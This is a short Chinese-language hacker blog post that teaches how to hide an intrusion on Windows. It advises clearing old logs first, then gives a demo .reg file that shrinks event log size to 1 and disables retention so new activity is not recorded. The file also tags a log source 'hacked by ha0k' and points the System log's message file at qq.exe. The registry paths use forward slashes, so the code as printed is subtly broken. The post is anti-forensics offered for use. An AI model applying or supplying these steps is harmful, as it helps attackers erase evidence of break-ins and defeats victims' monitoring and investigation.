by ha0k
日志檔案的位置其實是存儲在系統資料庫中的,隻要我們修改了其屬性即可掩蓋自己的入侵痕迹,
這裡隻修改預設位置,日志大小屬性,比如日志大小為00000001,使其不能正常記錄,
這樣的話即可完美保證入侵不被記錄,比清除日志更安全.當然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代碼:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%/System32/Config/Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Security]
"file"="%SystemRoot%/System32/config/SecEvent.Evt"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/System]
"EventMessageFile"="%systemroot%/system32/qq.exe"
"File"="%SystemRoot%/system32/config/SysEvent.Evt"
{本文轉自普瑞斯特部落格-原文位址:http://www.hacksb.cn/post/144.html}
![(1)如何快速的在指定檔案夾打開指令行?(1)如何快速的在指定檔案夾打開指令行?[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)